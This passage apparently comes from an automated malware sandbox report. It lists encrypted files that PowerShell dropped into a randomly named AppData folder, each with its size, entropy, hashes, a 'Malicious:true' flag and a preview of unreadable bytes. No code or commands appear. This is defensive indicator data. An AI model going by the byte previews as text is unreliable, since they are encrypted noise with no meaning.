                                                                                                    Category:dropped
                                                                                                    Size (bytes):192561
                                                                                                    Entropy (8bit):7.999066572046246
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:YlJojhotexga8023HXG7/+HNBOws/lIutuS74X1bd7jDb1y1+APo2PW9b9r9cR8G:5jhG3026QXuVkXZpjDbK+ySb9mR1MgR
                                                                                                    MD5:D30CEF947440BFB72473A9DB6E4FF774
                                                                                                    SHA1:908CF3672D8C9AF0C8A120EB20DE96CE83A54678
                                                                                                    SHA-256:124C96C5C3403BD998590C4E8DDA6FE8CE3E7D36FFFA876B544BDFAD1889072E
                                                                                                    SHA-512:A6E52A7C874FC1AEB155A391278BEA9CD50BCB2BB81B43832DDBD55456299086A623F2C1647591D580D7686EAD2595D251663CA2874D52EC38DC20F13BE3399A
                                                                                                    Malicious:true
                                                                                                    Preview: e.-JV.=.....X.o.l..pO..@.t....pC._..*.~AI.....\.....c..0..=...^.....D..~<...Z.?5+..-1.d........_....).O..]'..*n..g....d.v..K7...#S...'/.%..c....C.1.....2>......o..?[.l$..A....d..........+.'I?F......^.o....WHCO...l.N.#...A2.G..-..:.D. }'<....+NM....;f..<pH.,*Ku..R........Y.n..._S...A.h....XUs.j..Z..X.ig.*..O.:...........VB.......OzcB...>6...T.].<..C4.~c'..D..R.{|Vr+6<..J...T,b[..S.e..o...'.=....c.}.Fj.]3.9.....ARN`.q...X.|...;.s..\J...85p=.{m.dc...4.....&...4N....e...\.....;...V..d..\]uR..8...h..[..2.;...y..$I.w.. ..`.5.M..h...E.{....a.t...}......y......&{...I..".E#8...*9V.L......w.....W...I.<...z.<.+.Y."d.+..vZ...iIo...FRQ.'..j.?...G.=.e.2..h:1-a&.D.v.V...=D...._...]+.....[....&.....%..u.'.Y]...rj...9i.....@C.*(3.a.......)...;e.......1..r.e./5.<y....2Va.mm.v..D7_..g..\...}.Q.........j3f..iL.0...:d.r....X...x0.P.Y5.l..6b...{.S.s...#K...O.w.9.8mb..}..r.a.V..h....8.|.1.ZIj.R..._.}.={..}..1...R}...........G.*NC=.@..).n...b...<...3...5...
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\mLHqylxgROeIY.saQFAtwbiS
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):55202
                                                                                                    Entropy (8bit):7.996491554007425
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:v2Qs2gBdiUAfrswooCq3UrkcgRQhtnC/ftB:v2D2wrAfYSCDJhMtB
                                                                                                    MD5:5AC016B314E60ABB3B7A86AF54AA3A21
                                                                                                    SHA1:FC948A1E7D118AE2D8AB05B2102F9441599AE2E6
                                                                                                    SHA-256:104D1428EDC5A7B4B59A6D4843EC6A9956C54F0BF764B42F552F46477B1A5C94
                                                                                                    SHA-512:C716083B1FD2074487464648AA3B5E2DE65F7CB901E876BF34DB5BC43B786F4AF289691DB3C258E26EEFC0358A78567601712F9D56C3A016589FE13D8F00A7EB
                                                                                                    Malicious:true
                                                                                                    Preview: ...Qc....U....</2...YB..&.(.{> e&..w........G.}..5U.i...+..w41Y...ad..Cr%...}x...\.Z...Pf.f..m...L'/u.....K..w..I!..m...xY..%........".<.WESq..VL..t.ez.,...oZ"x.29..%...jo$.Y..S..&..%?..8.2."........[....D.i..Z.Q.K.N.{....mLH.....3.KwZ)4.e.b......5.x.P\.r......s..&..l...'..k...9.Y.c...>...t3P..".|..hC.].:c.j.......BB.gEP....{.;N!;._.2..U.....b....9...W..uW&..ve..S...,.z..13...J..adzF4.v..`..."....2}..-C$..&b...T.d.j.-.i....sa..z......o...uV;..z...i..{...!.qf.rs..6y...zCr.M8h.C.....p.o....\6m....C...__...3.P..._.]RXJ...r..;.jp...7..O..g.;Yf..... j...........E...i..s._.p...+..I..T....b....q..."Q.@../...n...&.?....I..UV.]..R...A.~..Y.Ks.....P.... .n.cHk.|."....R.\3....k.:j;Jz.. . ..V..{g..........s.c..0M@..P.. ..U...1...].~.=..........yT;..)....`.:.B/........YA./.e..-....;B4....3..Jk....J.7.l@^.o~..*.L\N\e.....Pm...Z/..H.......OY....;...$....C.....z.O...P.Z.f~.c7..C....H,Nay../.'.EA...I.><..O|,.N..b.tDzw...;.+.?.I!^....Lc@J..4.Wc.[..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\mOypzjQubiL.DwTnpEFAXkBIs
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):109468
                                                                                                    Entropy (8bit):7.998173418043891
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:0S+7PTlFDgsFAYoFpqeZ2ppyABOaH7gVEVtY9cvrWtZFk3MQm:L+tFDJFAYskRqqQc3kZFk3M/
                                                                                                    MD5:784807FB7BB4D6D3B98195CEB4CDDEDC
                                                                                                    SHA1:B4748FB795FCD961FB7EBF5BBAC1B8FF86E4C6EF
                                                                                                    SHA-256:BB9046A3B0A6BAF21270CF34DD2A8B3E1D965BC4F2333D36F654BF13C4FD7901
                                                                                                    SHA-512:AF950AC73A757657FC8E7CAA425FB7D48FF8ACA637A8E9840FCAF5EDA68F75F288B180538A1D5534EF448DC5E0AD3391B8DEEBCFD776794DDEC5EBEAC429AB64
                                                                                                    Malicious:true
                                                                                                    Preview: .(.....{.*SX..H..4K...B...(..!U..Vl.s.o.j...q.)..;KW.L..K.R.2..=.vP...=4..........{(..b....W..R...._......1A=P..r..W.}#;/..a....y.:}..a-...1^OEA..w..DM..#_s.2..i3..(/ia......a...7V4\"....KY...*........y.[.G.....32.J|...sPr..*.S.4';..:...N(.A.:..L.T&.4L......,N.Z..)....K....c..eWn.4.=Nn..3...k}..l.).p..#.l..80...%.l.4..,.......)....:..*.H....&..W...t....W...N..t.1).o.....w[..D.F#.m.s...$....|zk....3..6N....AWv-._{}.n........Z.|.S..7w.O.s........Z=.WNC%[...,F....F1.Rgh......l."{H..V...o.F..S.h.......}&&O....J.A....5.k.{"3F...4f.,a....0..P.R..{m..r.U.'.I.yP....W..Q.ZJI...'..%..Rr..~.Pqzjg5.3.a..v:(pmv.1h....4..K)ltM...}*g.._8..>.*.....R...x2`.|7#.)0N..K"".X....=|...x..rG!...)%...a.g.`....>..="h..........T...u.....H.T.@c3^Mt...G..%.....p....B..\L.......2v.58Na....+.h;..bi..k^...B. .. ,.K.V.h~..a!.,....h ...:.?...........lY....f.v...0......@....I....]q........>&C.q{.),....o.B....y`...Vba...^....Uf.V.^..k R!f!."...i%V.3*M....n..w..#V@_.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\mfVTGazKyhAXtCsEn.VSybpexCERAwcY
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):165781
                                                                                                    Entropy (8bit):7.998966110712019
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:El3Raj4KmqOVWGT6KQSESCp2pr9gIIgYQZAserqLxQdryKHrsK6rDde2T8M:c3R24KhOBpE6ZWIIgYQZAs8IAr7sbRfz
                                                                                                    MD5:28EE578CFB6E6BBB7168FEC31EF449E9
                                                                                                    SHA1:20AC2CACEE45C5F135C3AA620B8FBBF7ACF912D1
                                                                                                    SHA-256:82586B4B5067E62C531257CE26BF9FF5C788B3184263B65AB96BDA00328A6BB6
                                                                                                    SHA-512:28A6754AFEDF650B44220264AD5B719890DC53EFDD001352E4C9F5881763D9606D558FEF105F4F84202A8F7416F741D48A050C800056E4045AADEB4F105CF979
                                                                                                    Malicious:true
                                                                                                    Preview: ...E......v......d...9:..d.kX.=. ..Z.E..z...%k..4[./..3.i3a:.%s....>.y..._.'6.=..6....=......U.?@g.....b.6.}X3G#.g.v...F<'..........V...]z.........f#-.d....P..[xap=....?[.:}.1g....V...j ..5....)B.N.....'.xQ...0._.q..h....dZ..DSH......l|0A.:.n..k:.%mA..:.1..6......IKuy.W7t.hy{_?%....E...<.......m........$..a.%...Mc.tr9...>.....rm...<\....."..D.V\..X.n.fD..........:.j^..U..|.[..Xb[.Up... h....&..3..B,...v.U..M....=...D.t>9.w....(.E.5..l.pHa0.w.+m..$....~.g.....$..Q..l.....l.L}.qB.*mGF%.....Z..+..Pmj..-..`....). j[U.sCg...K.'.b.`....(?.e.?+J.....w.9..)...>p.9.v.."%.-B....<.G..Q...M....%..6.0.U..w..5.om.%.+.X.B...qnrK.3...n".wL.6.........i.Y.4..u,#t.....R>.oZ.a=..]...e.rU{........5.HS.vb...N.e.....J.d%j.... ....Z...z4.J.$........st&`".^.I.H|J.]..}Q.aB...r(.........!M...Pq.=....o..1b.!..w...Z.;.|.y\.y.s7Y...X.~...~Aw.....k...8?.^0k.5...b%.-.]..>....B|_.r..a.fwJfV.P.O....bY.*.;..tB.]..!Y;.`f..I...vtm.Q....G..F..5..g#/n..`H.....r.L....e..N..|....'x..\.`
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\mrSfhYtocBCOGXniKlu.zITnyRuGslc
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):115661
                                                                                                    Entropy (8bit):7.998539462777047
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:yDbK1Ki7Mj8kCQG2cYk5+q3cLiOcJg/fSuEQXyqo5521yIpgYPh/pJ4sGwx32I6m:avi7y8ktPcATF2X21qYPHoi32GEZuie
                                                                                                    MD5:016DF7E6F30F0AD9B2BD694F13FEB423
                                                                                                    SHA1:9C2B6B87EB1E2C747A26B969AEDA954BABCF173C
                                                                                                    SHA-256:32DDFF86FC172B9FBCDCFF67296F471A82AD5139ADF977091B28979038EA9FC3
                                                                                                    SHA-512:5DAD0C5726CE694B4B0C8E042874BC6B20304C2A862075DE259F728CA5A5440ED84A634A46DC326211BD7EDE8CF24A417E3577ABA1ECFBF58D4E73D92815690E
                                                                                                    Malicious:true
                                                                                                    Preview: X..:..LX.(V.u.=Z....ET..S.2j...n#.....'......$l.]6...Pv,.Pg.T.p..m....o.'Z5t/\H...].67s.....(d'..|..0.=&t.A........%6.7XG,.@.\1.M........6.@..!....3..Z.E.[......pj.6R..J...,.b..71{@.)KC.P......{.Q....r.aZ.N;.......G..T...r.`.z.9..tu.....29.....>32X.GoE.I..._..5V....5.!..).[.....2.-^...0e.B..f....F7a.FQ.......&..y..%...+..<...g............3V.....b.'oiHG5.^.....R......`0.*...4.(c.t...@...j=....;,...w_.?...`.*i..w ...\S.....*o.......(..Z.").4..."C}G.E.S.o..L[.l.."...O....9*A.K.C.+......x.....s..IkN...qWWx^).:..R...D`...}....lF...7/3NJ....T..k.......].b.i....Z7h`L.......y(...{O....r.:..)H .....U%.........A9..K..ra.H6...m-...3&*x.....nG..i..u...0.$.=X.w.../.....F..}..@...Y.x.2..#..}......o.Sz...k>.....=...._.~..."..1c..|...iO2.t...1..r.3S...Q.~...c.o.3...8IM9.o...0..6.....<k./.R.T6..2.X..:...N`&S#MO....q....j.>..a8..n-J[...I.EA.....i.....=.0..}.'.g...v\qXZ.R.^(......UJ....+0*x[.4.i.#.P.gF....Y3...9X....-..E(/...*N.y..c......o.$4.!\y.......?......."
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\nNsJXqaRkFQIVh.repMtLEGluna
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):92428
                                                                                                    Entropy (8bit):7.998103718903747
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:gMC/Ty7fOspCBlBafnb5ND3TsKFwbTL/haaK0wFtwQhXGTya4vf/u77uk:4Ol5NzTsqgTL0Obya4vf/Xk
                                                                                                    MD5:F6A1B7694FBB3C51BCB3BF2ED22E3E99
                                                                                                    SHA1:1C93949A47C78D3C626B8F1E08C4239663F2A3E4
                                                                                                    SHA-256:66FFACC2029B276A51743AC8FF7575A440341963604DD14FB123C586E725B076
                                                                                                    SHA-512:A29B2FAF9EA25343D9715E2E0FBF3689A2DACBB9647EA7E749ECF93B2F95E7EF14D138C59F7EE863F4968E16ABE52F222A20C86646CBF313B0912D79822FC318
                                                                                                    Malicious:true
                                                                                                    Preview: .....%5...S..'..h)7.T....u.X..&.F...i..E..P..D.'b.k../E...Bo....I\V.H`..U.L.......r[....[=_.J.6..].t....+b...<.wy.NB.....".......]...g.g.,..g.j...A.Iw....... |<#.}...Z.8.!Oc9.z......>...y.U..W...Z\....X.H...B ...^g.o.....|T_$ ..."...s..a....4.yP....U.+...K..h.w..*..O...t..-..l.6......G.......B.%B...."..t...2.......]&.=X..3.j_*.".)]..|CO-....M.zo1@.).^l2~.Gfk....6.M.-..;.H.._...X]...........O....-.._....X..._@kZ6.[....SNT}.......z.R.R...uf....n.....q.._. ..e...H..L.M..p.=.o.(...,.~)..1.o..h.........."...`...|..rl.X.].G.O..IO.y.....{.._..3....Ok.5./.C.^M0.F..#......"fW..el....C-p.....v......5@.z..1~...etfK,q..l..w....\..b*i.u.>].S.L...]/Z.45X.F).L.G"%...!.j.-./.X...8,H5R,..sL..e.._.....Vv..h$...4....W..O.C.);"..R...k..g..&j..{.v.nP8.4\.c.,;nj....#.J~...._..6}.....5...-..T......+..e..w......R.......P.%...X...f...;..J...\...j....;:...@.f..."..3BA.3.W.!...VM....*N.\'\..}y.:.>.O(D........>t...D.e.S.^.it....T...aH..Rv5..#rO
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\nVtfZzYLAsdWieo.SkZbYxzBrUimy
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):116737
                                                                                                    Entropy (8bit):7.99869527111815
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:xpkLfbtNsazMah80x7YBTA2bio68OIS55yFKu7tAp6VeJCo+9n:vWsjhmYi2u8OX+p726VURen
                                                                                                    MD5:FD1F17B50D8B2C7CB64C4A61C3E63A29
                                                                                                    SHA1:4719FDABDCE92C1427A2A5EC8AD98278C97B5767
                                                                                                    SHA-256:C285E47DE0508CC8FED6C973F4687FCD1E53BDC500DB74C6FC796CB1FE9727BF
                                                                                                    SHA-512:BB18BCAACB5EEC0AC58873FD1C5930CED3F8EDDDF1EF108C035C99E3CB885EAD8073C7E9BBDDEF05CDF497923366045209DC99722FB3A67F1FC96F9FA34323E1
                                                                                                    Malicious:true
                                                                                                    Preview: k..Dg..lpR.i_.Q.>O.).7]....z\..M.%.....4..6.Sae...Al.L.hf.7...O...P(.....&.jX.......G..3Ff......w.w.}[c.L..%...`#Z..F.cX..H.....q?...8..{....}GW..U.!NfE.z..G.S.p.u.^D%!...R...w..[ ..O.j....A.k.(..;.i.3.....^n...)2.nd...H.q\...1o...m.e:lx...|..9M.v...!..?K.,..<.L.7.:.*..........].....\.%.K....0..t..Kk..w..^@..|.B.ggl.<\.....n9J/o.T.X......WK../..........;<F1..2.!.....L.r.\...?,.c`rZ....r.^:F... }.......t..K...S...D\....xh...m.......O\.&+&.l..Xj...C.eJ.l"^*)O.k....E.q......C...YLY.J.yd...4......H.G%.S...o..(e........X..........qu..3....:....bX.2.sO..i...?..P.....I.~}..YN..Fh.K6.R.U2..\z.?..].s:..T.X.[....c..V...d.....!|6..24..-/..@T4f:........_.Er......A.w....I.../..H.'.0.<.q...kmlxM$...i....o.||..Y..^..;....@..0...c4...8........w.....sh....T....t...!..nm.......Z...p.V.H.2x.[8.D...UY..g.Tx......H<..KM.;.9.MC..c...BPl..P.*~...z.6:...br....I.qg.J..5h.e...vk.....NY....i..A....f....a.....Q.{....2\"..-A...#_N.h.k =...~.z..] \.Z..X$x?=.A....R.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\nYhyEmGcPIK.rBiKdcykOnulxbRQXf
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):76490
                                                                                                    Entropy (8bit):7.997383285233256
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:Wv+8ZarBidGLnB6sybTJiZdDsr7JZuCQ3xLjxh+z+vOhUi4lSmH:WvZar4dGLBibliZdDsrtZuCmVjEy+kSE
                                                                                                    MD5:B3292254DC4CE251433290153231F9D9
                                                                                                    SHA1:3D524B170224B7E834687886295CC884737EDACE
                                                                                                    SHA-256:010CB7057C21CEC29F009219624926FBE27506E67C6087404D12D9ABE428EE2C
                                                                                                    SHA-512:31DF865BF9BF920896AF676539B29FD74B75E661845C3FACBB0F6428706929A31E46FA0C4D638CB8B56676D74E81A504881BA6A84968A35EC7AF4081DBDE4FE5
                                                                                                    Malicious:true
                                                                                                    Preview: .znz@...UX..7mz...7.../"}.T..4I...q$s..Hz.{.1..0hQM..KL.jQ2*.#....dr..2l.E^..4#..^......%'..d.............W..R6-sjgV.i...M..~......1.-,...(..~...MV.e..F....H<.v..E=.I...)......CY4vM.5...7.t..._..v....h;wKS.....r....V.[.....Q..kw.Ko._..n... ...d_.Z. ....k. ..U.VM...@X.....?...\....Wk.w.....C..a.'`..a.7..=.....m.....jd$;.~~Q.q.52.*LG m...[+.....Ak.*.Y=J<.qfY'...2C.@.R....&..T..2.] .....8X>3..C`.X..?...PC$A....!Y.^.s.C..t..Z......q.2V>...WoF..E..M......M{......eP....kQe.-.....=.8..qu....Q.M.0mb..y+.RP..e@.....6...C....:....`4....=.~Tb^.L.e_..Q6....<.8..#g.W.....c.x.2....h.I.Z,.'VhO?...na.x....J^.d.=.:n4.8vV.i.`yQ.Q9.#.iR@............-..<.~.l1..7=".%.A..2.PU.^.XD..j...p..L/R...0........3..{w.'n.D..U......K..$...S..^y...y5.e.......K{..P.SH.....lm......}. U.K.9....$....P ...&Q.........o.....W...Hq..GOk..'...:6.3..9..,..D.T9..K........#H..nT...#..;Dn....P....62...P+...h .j8.-nqX..._.k.*.....o.Z41.W...N..Q."..].4e2G.......gQ..X.O..n0..Di.....Z.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\nZgWUTfIbV.NcIMegvYBwQATEHFZ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):75361
                                                                                                    Entropy (8bit):7.997249482680939
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:DPr2m3tsggbEzKqMzV8gOb3OSaCfjdTqTNIZ54yGtOuanjaihVT:X2A4MKq8TI3XBMy6ObnjLhVT
                                                                                                    MD5:20EA5D3489DA8710D434C323E635371B
                                                                                                    SHA1:08A2176D4404FF1F8959DFA24341B610E25359C9
                                                                                                    SHA-256:03BCBE558AF480BA86256CEF3DB14ED65D828982FFC05A1AAA844DEDCF35D776
                                                                                                    SHA-512:605F27B130C9010BF90C7B41E6A80FD4C42B1005593DC838072A1782839FB0CE6117B81D9DD7D51946D2D074E819578D1B0079F75F2E3B08B7ACA15394FA0DEF
                                                                                                    Malicious:true
                                                                                                    Preview: ........KCpb....W.Kq.M...#.........b..K..+/.. P=.rU:(....]...;|[...'.`._.........T...H:Sa9.\h...1...<......V........n8N..M.3..w).y...4i..$^..cq.?..KrA*hx...-w..._+O....\..J.j.b...8.,..N.....iRH.k7!./.c.2......@..D....,|...#...ev+...l<.^m..^i.W..S. ..^.....7..k...u.=.%.....>.........k...&...%.,..^.......p...m..:K.;l...|9..._4.0."T......G..jwm.F..~....Q.2..b..`_Yo...h3...S.s"*~.=.v.98......4...\.F.J*.9`v..u6...6L..j..'7.h.,!5p.DL..VB...p}.c"s...g..3......p?....M....z..YF.e.X..d.....5.$.0......Z..U3q.[I.{U_..'...P.h"exI....RN.?...{..in9.'I.....Rr.a..(.k......}q..i..g..Q..O..1..t. *R.5.i...`|..bS..!g.Xi(...DZ.5t...s..z.;.:.| ;].^.Rv...)$..%R....i..<.I\../.{...|..!))/..oa.j..Y....n.Q....:.....=.$..?o<O..Dl....D.x.SN+.a. M.C!,....w,1R..1.........t.(.z...#?.>....G..gyZ.Ec..jGg..!H...P.B....~....}r1.&.X4.~.9.....+2;27.%.h.B..][...!.A~[.....Fca4..K:o.;e...........5..e..8O:.sh...ll-.i...;,2+..Y.|..s......Oc[X.O.V.../Oj...$.>*..*..b.z.{7.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\nbdHxsrGkAhfXtMRwW.pxgjWrdGRQi
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):127674
                                                                                                    Entropy (8bit):7.9987548033988025
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:8sfeI5uTnIcku+KCNIiaCHCpKMu9OTk5zitoK9ll+gs+zDS0vr:XVEnAu+KCNmkMwOYzitDYg8sr
                                                                                                    MD5:1D591B05170F8FD9BE6C7BF95AE62CAC
                                                                                                    SHA1:AC30572B654B4B0EFA1EA3054F90790D585D131C
                                                                                                    SHA-256:94E586DD69FE76C018A35A595C91DCB456D7C55A71A99749413CF130D7BC8AE1
                                                                                                    SHA-512:C92009316E9B3E4CB64EFD302E4EE4D9A5DA0281300D9903FE5B4A7F23E68350204657DB54B970556B9273974DAD972A6701B1D488875D6A2D7C331648E0E35B
                                                                                                    Malicious:true
                                                                                                    Preview: .....S!..j.5....gr...$4.E.,..V)T..K..$u|..-..".Wx.z....Z.=..........t..P.q.....J...,.K68.<.;.!...`..q.4.....!...c..@.X..<z...kP....).'.]kb..n..D...A...X.k\.....\.A..0...H......NI-.!.\[0dD.../....wm.....lA..w\.cO...XpR..[.3~\...iW.4.0)J{..E..Vz^6c.>..S.E........P..;.U.|.t4...}.k*P....6.Sa.'._...Ea.x...b...{[..B.9...O..(~......&.L...0.O=.B*..%_.......OU.D......p.......0<V'.....t...\!..$^W.TI+A..Sp+.f..}D....g..G......Lx...+.K.<m.vQH....Z...z...$i.Ep.I.Q.I~=+U;..O....:3..8b,H<Wc.X.8..>..c.[.>..Y.1\..<e..?%..&.W....P....WX.#sZ.71v.M..=t.e.V..m.[./.V}..4......**..>..T..i...U...+..!...?..T,..P.rD...o.C6..R..Q..Dz}Z$...h.T...x.O.....d...t..U..G.G..$=.VZ`g;.O..p-.g....<OA..y"....6....X.9S..A">j....._.....E'^..jN....o..A.}.....3....?.@...,X.........Gap./....l.............Q.X.c..r..tC...GF7.c.%..'...#S13.df.~...v...h.Ef..E.I...~pd..O..A.&> .2......q....t.S.y.....+knD.P'..(...6.]....."$.r..k{K.|.}.yJ~.c......%.....HIif...........
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\nrPdzlWUTZMvCxiFg.IVocudRDyhq
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):197073
                                                                                                    Entropy (8bit):7.999213676015918
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:g74JVwpZs6iQ8QXfeGom7HXcTkYSW/NKF6krmhA/KdEyiqH:g7VfBZTKkf6Id/WH
                                                                                                    MD5:833D2AC7F0B5D66B2C063F96F120A1F0
                                                                                                    SHA1:5858530DD7A0910267A6BBC68EBD99725249C477
                                                                                                    SHA-256:EA2DD6DA829AFA79FA4FD3C1107341C03C9F0B3C8E8B04E9BB4800428E2D3973
                                                                                                    SHA-512:7DDB260E7A3AE247007825E610090466D8FF7817762C0512A7094BAF5FAF83550C50A4BEBFCF890AB2B6A90E6C4391E31E6DDBEB7E3719890ED6196472E9254D
                                                                                                    Malicious:true
                                                                                                    Preview: ..=...M..._H.za...U......_......H.l.sU.r...._(.PzM.:.,.`v..^'...+....x.*;..+..d.o[[..S..FE.....4..Z.....t.4YK)....~m..&.B.g3..C...I.C....A4..R...S.1..d...I4o..._`T..}.........K.A..DX..P...(..S...]<...p....(4YX$.C$....Mw.Y...[...}..k.....(V6x.2x.W...?......o[....T..}..O."v..X-8... ..=........V..\%l.+.Fp.5p.._PG...N....N...G..>.S...K..C..w..]/....:R.RtGD/.)2l2.,.V...M.J.[.C....4..e.\.3.........1.?....Fx......pu.....'.l.O.X..P.-X...<..........B-.n......N.@.....b......p....Z..y..M..^O9.,.0H...*.E.y#........O..V..A1.\@z.A?;..}.fd..:...^.{H.BY..F....q.Q.Y..I..'.-rV............I....~....Y....t S....BU.....NY..!....Up[5...e.hj...../.......J.+R}.ehE.a.e...u_.o....~s..zU.{5..`98...i2....z.b...k.)...J.....6..O=t..av.r.....L..ca..d..9.yR.....*L..i.%..b...$.f1..@.....F.(.;...^...l}Xx}Vu.U.B.....rX......M~3..5.0.Q~.a..<.....T5......Jt.i.0.A...x^.z..A(..PVi*.I.../."...~...._...:l.....V.#H..7..q.Yn<Y..d[M.OZW[...G.lp....}#.MV.......b.gJ.J....%*z..od...A..eb|...y.
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\oHOZepRMCYPilyhX.ifzlgDILyw
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):79149
                                                                                                    Entropy (8bit):7.997433985431224
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:v2Qs2gBdiUAfrswooCq3UrkcgRQhtnC/ft/ebm9Z8wYUUCL4Y9qBYH:v2D2wrAfYSCDJhMtGKwwYLCfgBYH
                                                                                                    MD5:0E7A28E23EAA8F62D124B1B074E20FF8
                                                                                                    SHA1:091DF03BDCD1C49B48AC6DCDF8D8E60F886012F5
                                                                                                    SHA-256:78C5F86562C34FEDC7B20AFD9B3B9C0CAD569FE47C3F84541915BC21CF8E7866
                                                                                                    SHA-512:6CDF58940E8C4E2AFF93B21764C095273CC84A219BF936C6EC03E94D017E6031B25E6AC973428765947791CDE61ADA6E1DA5448638A7867B40D419B346E7A4EE
                                                                                                    Malicious:true
                                                                                                    Preview: ...Qc....U....</2...YB..&.(.{> e&..w........G.}..5U.i...+..w41Y...ad..Cr%...}x...\.Z...Pf.f..m...L'/u.....K..w..I!..m...xY..%........".<.WESq..VL..t.ez.,...oZ"x.29..%...jo$.Y..S..&..%?..8.2."........[....D.i..Z.Q.K.N.{....mLH.....3.KwZ)4.e.b......5.x.P\.r......s..&..l...'..k...9.Y.c...>...t3P..".|..hC.].:c.j.......BB.gEP....{.;N!;._.2..U.....b....9...W..uW&..ve..S...,.z..13...J..adzF4.v..`..."....2}..-C$..&b...T.d.j.-.i....sa..z......o...uV;..z...i..{...!.qf.rs..6y...zCr.M8h.C.....p.o....\6m....C...__...3.P..._.]RXJ...r..;.jp...7..O..g.;Yf..... j...........E...i..s._.p...+..I..T....b....q..."Q.@../...n...&.?....I..UV.]..R...A.~..Y.Ks.....P.... .n.cHk.|."....R.\3....k.:j;Jz.. . ..V..{g..........s.c..0M@..P.. ..U...1...].~.=..........yT;..)....`.:.B/........YA./.e..-....;B4....3..Jk....J.7.l@^.o~..*.L\N\e.....Pm...Z/..H.......OY....;...$....C.....z.O...P.Z.f~.c7..C....H,Nay../.'.EA...I.><..O|,.N..b.tDzw...;.+.?.I!^....Lc@J..4.Wc.[..
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\oIKiDVCakpHw.cDqyRkgfSdrsNABj
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):94505
                                                                                                    Entropy (8bit):7.997890884571381
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:bKZYnvdhyNzHIBLCJSyK7SusjO+L8+rYtQQNp/koHECJMTm+5lobQz8vBRVSh9PM:h6FHIBLqSFxsjO+Y+UDPHED5oQzGRV4u
                                                                                                    MD5:374731EF9FD31CE97359C79D5F1BBCD5
                                                                                                    SHA1:030DC378B2283C4804DE778B9723ECF7FEABBFE1
                                                                                                    SHA-256:156597AE86AE0DB28F1EE1401ACF4A2F7984D348B10C1093C1ACA7CEFF20CCC8
                                                                                                    SHA-512:DA31DC99A74FBACD82B61C9AEDA79330F67B5EDC58197042E2EF3BC7CABCF918252E78C81523C62A93287B684E49595806902C4C0E74259CE3090474B9AF36F9
                                                                                                    Malicious:true
